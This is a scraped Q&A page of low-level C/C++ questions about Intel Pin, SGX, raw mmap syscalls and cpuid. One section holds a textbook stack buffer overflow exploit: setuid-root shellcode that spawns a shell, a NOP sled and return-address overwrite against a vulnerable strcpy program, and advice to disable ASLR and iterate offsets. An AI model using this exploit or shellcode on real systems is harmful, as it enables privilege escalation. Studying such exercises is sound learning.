Why does the pin count only three blocks in trace? - c++

I want to list all traces with the blocks they contain, using intel pin. But, as a result, I have a maximum of three blocks in the trace, although there should be more. Tell me, please, why is that so? Thanks in advance!
#include "pin.H"
#include <stdio.h>
using namespace std;
FILE* traceFile;
UINT32 traceNumber = 0;
VOID Trace(TRACE trace, VOID* v)
{
UINT32 blockNumber = 0;
// print trace info
fprintf(traceFile, "Trace [%d]: %p, number of blocks: %d\n", traceNumber, TRACE_Address(trace), TRACE_NumBbl(trace));
for (BBL bbl = TRACE_BblHead(trace); BBL_Valid(bbl); bbl = BBL_Next(bbl))
{
// print block info
fprintf(traceFile, "\nBlock [%d]: %p, insts in block: %d\n\n",
blockNumber, BBL_Address(bbl), BBL_NumIns(bbl));
// print all insts in block
for (INS ins = BBL_InsHead(bbl); INS_Valid(ins); ins = INS_Next(ins))
fprintf(traceFile, "%p: %s\n", INS_Address(ins), INS_Disassemble(ins).c_str());
blockNumber++;
}
fprintf(traceFile, "\nTrace [%d] end. %s", traceNumber,
"\n---------------------------------------------------\n\n");
traceNumber++;
}
void Fini(INT32 code, void* v) {
fclose(traceFile);
}
int main(int argc, char* argv[])
{
traceFile = fopen("itrace.out", "w");
PIN_InitSymbols();
PIN_Init(argc, argv);
TRACE_AddInstrumentFunction(Trace, 0);
PIN_AddFiniFunction(Fini, 0);
PIN_StartProgram();
return 0;
}
For example, there are only three blocks here, although I expected to see more:
Trace [4]: 0x7722de32, number of blocks: 3
Block [0]: 0x7722de32, insts in block: 2
0x7722de32: test eax, eax
0x7722de34: jnz 0x77279708
Block [1]: 0x7722de3a, insts in block: 3
0x7722de3a: movzx eax, byte ptr [0x7ffe0384]
0x7722de41: test eax, eax
0x7722de43: jnz 0x7727971d
Block [2]: 0x7722de49, insts in block: 2
0x7722de49: cmp dword ptr [ebp-0x24], ebx
0x7722de4c: jnz 0x7722de5b
Trace [4] end.
---------------------------------------------------
Shouldn't there be 5 blocks here? Apparently, I don’t understand something about blocks and traces. I didn’t see anywhere in the logs that the number of blocks in traces is more than three, for some reason.
in the debugger I see at least 4 blocks
I want to list all traces with the blocks they contain, using intel pin. But, as a result, I have a maximum of three blocks in the trace, although there should be more. Tell me, please, why is that so? Thanks in advance!

Related

What is the SGX_CDECL macro?

I'm trying to understand how to create my own sgx application, so I'm scrutinizing SDK samples.
I'd like to know what the usage of SGX_CDECL is?
in the sample below as well as in general
/* Application entry */
int SGX_CDECL main(int argc, char *argv[])
{
(void)(argc);
(void)(argv);
/* Initialize the enclave */
if(initialize_enclave() < 0){
printf("Enter a character before exit ...\n");
getchar();
return -1;
}
/* Utilize edger8r attributes */
edger8r_array_attributes();
edger8r_pointer_attributes();
edger8r_type_attributes();
edger8r_function_attributes();
/* Utilize trusted libraries */
ecall_libc_functions();
ecall_libcxx_functions();
ecall_thread_functions();
/* Destroy the enclave */
sgx_destroy_enclave(global_eid);
printf("Info: SampleEnclave successfully returned.\n");
printf("Enter a character before exit ...\n");
getchar();
return 0;
}
Have a look at https://en.wikipedia.org/wiki/X86_calling_conventions#cdecl
cdecl, subroutine arguments are passed on the stack. Integer values and memory addresses are returned in the EAX register, floating point values in the ST0 x87 register. Registers EAX, ECX, and EDX are caller-saved, and the rest are callee-saved.

Tracking native instructions in Intel PIN [duplicate]

This question already has an answer here:
What instructions 'instCount' Pin tool counts?
(1 answer)
Closed 5 years ago.
I am using the Intel PIN tool to do some analysis on the assembly instructions of a C program. I have a simple C program which prints "Hello World", which I have compiled and generated an executable. I have the assembly instruction trace generated from gdb like this-
Dump of assembler code for function main:
0x0000000000400526 <+0>: push %rbp
0x0000000000400527 <+1>: mov %rsp,%rbp
=> 0x000000000040052a <+4>: mov $0x4005c4,%edi
0x000000000040052f <+9>: mov $0x0,%eax
0x0000000000400534 <+14>: callq 0x400400 <printf#plt>
0x0000000000400539 <+19>: mov $0x0,%eax
0x000000000040053e <+24>: pop %rbp
0x000000000040053f <+25>: retq
End of assembler dump.
I ran a pintool where I gave the executable as an input, and I am doing an instruction trace and printing the number of instructions. I wish to trace the instructions which are from my C program and probably get the machine opcodes and do some kind of analysis. I am using a C++ PIN tool to count the number of instructions-
#include "pin.H"
#include <iostream>
#include <stdio.h>
UINT64 icount = 0;
using namespace std;
//====================================================================
// Analysis Routines
//====================================================================
void docount(THREADID tid) {
icount++;
}
//====================================================================
// Instrumentation Routines
//====================================================================
VOID Instruction(INS ins, void *v) {
INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)docount, IARG_THREAD_ID, IARG_END);
}
VOID Fini(INT32 code, VOID *v) {
printf("count = %ld\n",(long)icount);
}
INT32 Usage() {
PIN_ERROR("This Pintool failed\n"
+ KNOB_BASE::StringKnobSummary() + "\n");
return -1;
}
int main(int argc, char *argv[]) {
if (PIN_Init(argc, argv)) return Usage();
PIN_InitSymbols();
PIN_AddInternalExceptionHandler(ExceptionHandler,NULL);
INS_AddInstrumentFunction(Instruction, 0);
PIN_AddFiniFunction(Fini, 0);
PIN_StartProgram();
return 0;
}
When I run my hello world program with this tool, I get icount = 81563. I understand that PIN adds its own instructions for analysis, but I don't understand how it adds so many instructions, while I don't have more than 10 instructions in my C program. Also is there a way to identify the assembly instructions which are from my code and the ones generated by PIN. I seem to find no way to differentiate between instructions generated by PIN and the ones which are from my program. Please Help!
You're not measuring what you think you're measuring. See my answer here for details:
What instructions 'instCount' Pin tool counts?
Pin does not count its own instructions. The large count is the result of preparation before and after main() and the call to printf().

mmap system call returning -14(-EFAULT??)

I am implementing mmap function using system call.(I am implementing mmap manually because of some reasons.)
But I am getting return value -14 (-EFAULT, I checked with GDB) whith this message:
WARN Nar::Mmap: Memory allocation failed.
Here is function:
void *Mmap(void *Address, size_t Length, int Prot, int Flags, int Fd, off_t Offset) {
MmapArgument ma;
ma.Address = (unsigned long)Address;
ma.Length = (unsigned long)Length;
ma.Prot = (unsigned long)Prot;
ma.Flags = (unsigned long)Flags;
ma.Fd = (unsigned long)Fd;
ma.Offset = (unsigned long)Offset;
void *ptr = (void *)CallSystem(SysMmap, (uint64_t)&ma, Unused, Unused, Unused, Unused);
int errCode = (int)ptr;
if(errCode < 0) {
Print("WARN Nar::Mmap: Memory allocation failed.\n");
return NULL;
}
return ptr;
}
I wrote a macro(To use like malloc() function):
#define Malloc(x) Mmap(0, x, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0)
and I used like this:
Malloc(45);
I looked at man page. I couldn't find about EFAULT on mmap man page, but I found something about EFAULT on mmap2 man page.
EFAULT Problem with getting the data from user space.
I think this means something is wrong with passing struct to system call.
But I believe nothing is wrong with my struct:
struct MmapArgument {
unsigned long Address;
unsigned long Length;
unsigned long Prot;
unsigned long Flags;
unsigned long Fd;
unsigned long Offset;
};
Maybe something is wrong with handing result value?
Openning a file (which doesn't exist) with CallSystem gave me -2(-ENOENT), which is correct.
EDIT: Full source of CallSystem. open, write, close works, but mmap(or old_mmap) not works.
All of the arguments were passed well.
section .text
global CallSystem
CallSystem:
mov rax, rdi ;RAX
mov rbx, rsi ;RBX
mov r10, rdx
mov r11, rcx
mov rcx, r10 ;RCX
mov rdx, r11 ;RDX
mov rsi, r8 ;RSI
mov rdi, r9 ;RDI
int 0x80
mov rdx, 0 ;Upper 64bit
ret ;Return
It is unclear why you are calling mmap via your CallSystem function, I'll assume it is a requirement of your assignment.
The main problem with your code is that you are using int 0x80. This will only work if all the addresses passed to int 0x80 can be expressed in a 32-bit integer. That isn't the case in your code. This line:
MmapArgument ma;
places your structure on the stack. In 64-bit code the stack is at the top end of the addressable address space well beyond what can be represented in a 32-bit address. Usually the bottom of the stack is somewhere in the region of 0x00007FFFFFFFFFFF. int 0x80 only works on the bottom half of the 64-bit registers, so effectively stack based addresses get truncated, resulting in an incorrect address. To make proper 64-bit system calls it is preferable to use the syscall instruction
The 64-bit System V ABI has a section on the general mechanism for the syscall interface in section A.2.1 AMD64 Linux Kernel Conventions. It says:
User-level applications use as integer registers for passing the sequence %rdi, %rsi, %rdx, %rcx, %r8 and %r9. The kernel interface uses %rdi,
%rsi, %rdx, %r10, %r8 and %r9.
A system-call is done via the syscall instruction. The kernel destroys
registers %rcx and %r11.
We can create a simplified version of your SystemCall code by placing the systemcallnum as the last parameter. As the 7th parameter it will be the first and only value passed on the stack. We can move that value from the stack into RAX to be used as the system call number. The first 6 values are passed in the registers, and with the exception of RCX we can simply keep all the registers as-is. RCX has to be moved to R10 because the 4th parameter differs between a normal function call and the Linux kernel SYSCALL convention.
Some simplified code for demonstration purposes could look like:
global CallSystem
section .text
CallSystem:
mov rax, [rsp+8] ; CallSystem 7th arg is 1st val passed on stack
mov r10, rcx ; 4th argument passed to syscall in r10
; RDI, RSI, RDX, R8, R9 are passed straight through
; to the sycall because they match the inputs to CallSystem
syscall
ret
The C++ could look like:
#include <stdlib.h>
#include <sys/mman.h>
#include <stdint.h>
#include <iostream>
using namespace std;
extern "C" uint64_t CallSystem (uint64_t arg1, uint64_t arg2,
uint64_t arg3, uint64_t arg4,
uint64_t arg5, uint64_t arg6,
uint64_t syscallnum);
int main()
{
uint64_t addr;
addr = CallSystem(static_cast<uint64_t>(NULL), 45,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS,
-1, 0, 0x9);
cout << reinterpret_cast<void *>(addr) << endl;
}
In the case of mmap the syscall is 0x09. That can be found in the file asm/unistd_64.h:
#define __NR_mmap 9
The rest of the arguments are typical of the newer form of mmap. From the manpage:
void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
If your run strace on your executable (ie strace ./a.out) you should find a line that looks like this if it works:
mmap(NULL, 45, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fed8e7cc000
The return value will differ, but it should match what the demonstration program displays.
You should be able to adapt this code to what you are doing. This should at least be a reasonable starting point.
If you want to pass the syscallnum as the first parameter to CallSystem you will have to modify the assembly code to move all the registers so that they align properly between the function call convention and syscall conventions. I leave that as a simple exercise to the reader. Doing so will yield a lot less efficient code.

bufferover exploit not working on gcc

I was trying to run this buffer overflow exploit on a vulnerable code vuln.c on gcc (I found this on some tutorial and code is not mine).The shellcode spawns a shell.
exploit.c code
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";
unsigned long sp(void) // This is just a little function
{ __asm__("movl %esp, %eax");} // used to return the stack pointer
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
offset = 0; // Use an offset of 0
esp = sp(); // Put the current stack pointer into esp
ret = esp - offset; // We want to overwrite the ret address
printf("Stack pointer (ESP) : 0x%x\n", esp);
printf(" Offset from ESP : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);
// Allocate 600 bytes for buffer (on the heap)
buffer = malloc(600);
// Fill the entire buffer with the desired ret address
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }
// Fill the first 200 bytes of the buffer with NOP instructions
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }
// Put the shellcode after the NOP sled
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }
// End the string
buffer[600-1] = 0;
// Now call the program ./vuln with our crafted buffer as its argument
execl("./vuln", "vuln", buffer, 0);
// Free the buffer memory
free(buffer);
return 0;
}
This exploit is for the vulnerable code vuln.c:
int main(int argc, char *argv[])
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
But when I run it using ./exploit it gives a segmentation fault instead of opening the shell.I used the commands:
sudo chown root vuln
sudo chmod +s vuln
ls -l vuln
gcc -fno-stack-protector -o vuln vuln.c
./vuln
gcc -o exploit exploit.c
./exploit
It shows the result:
(gdb) run
Starting program: /home/a/exploit
Stack pointer (ESP) : 0xbffff338
Offset from ESP : 0x0
Desired Return Addr : 0xbffff338
process 4669 is executing new program: /home/a/vuln
Program received signal SIGSEGV, Segmentation fault.
0xbffff338 in ?? ()
(gdb) info registers
eax 0x0 0
ecx 0xbfe3f5a0 -1075579488
edx 0xbfe3dca8 -1075585880
ebx 0xb76e4ff4 -1217507340
esp 0xbfe3dc60 0xbfe3dc60
ebp 0xbffff338 0xbffff338
esi 0x0 0
edi 0x0 0
eip 0xbffff338 0xbffff338
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
Please tell me where the problem lies...
Your problem lies in the address you are jumping to....
That exploit does NOT use memory leaks, so it is supposed to be run in a system that does not support ASLR.
Once ASLR is disabled in your system, you have to run the exploit N times until jumping to the right shellcode address...
Function sp() returns the esp on this process, but it may change depending on the backtrace and the process... so you will have to increment a value until reaching the right address.....
Conclusion:
disable ASLR
add an offset getting iterated each time and add it to the esp value before is used
Good luck!!!!

How do I call "cpuid" in Linux?

While writing new code for Windows, I stumbled upon _cpuinfo() from the Windows API. As I am mainly dealing with a Linux environment (GCC) I want to have access to the CPUInfo.
I have tried the following:
#include <iostream>
int main()
{
int a, b;
for (a = 0; a < 5; a++)
{
__asm ( "mov %1, %%eax; " // a into eax
"cpuid;"
"mov %%eax, %0;" // eax into b
:"=r"(b) // output
:"r"(a) // input
:"%eax","%ebx","%ecx","%edx" // clobbered register
);
std::cout << "The CPUID level " << a << " gives EAX= " << b << '\n';
}
return 0;
}
This use assembly but I don't want to re-invent the wheel. Is there any other way to implement CPUInfo without assembly?
Since you are compiling with GCC then you can include cpuid.h which declares these functions:
/* Return highest supported input value for cpuid instruction. ext can
be either 0x0 or 0x8000000 to return highest supported value for
basic or extended cpuid information. Function returns 0 if cpuid
is not supported or whatever cpuid returns in eax register. If sig
pointer is non-null, then first four bytes of the signature
(as found in ebx register) are returned in location pointed by sig. */
unsigned int __get_cpuid_max (unsigned int __ext, unsigned int *__sig)
/* Return cpuid data for requested cpuid level, as found in returned
eax, ebx, ecx and edx registers. The function checks if cpuid is
supported and returns 1 for valid cpuid information or 0 for
unsupported cpuid level. All pointers are required to be non-null. */
int __get_cpuid (unsigned int __level,
unsigned int *__eax, unsigned int *__ebx,
unsigned int *__ecx, unsigned int *__edx)
You don't need to, and should not, re-implement this functionality.
for (a =0; a < 5; ++a;)
There should only be two semicolons there. You've got three.
This is basic C/C++ syntax; the CPUID is a red herring.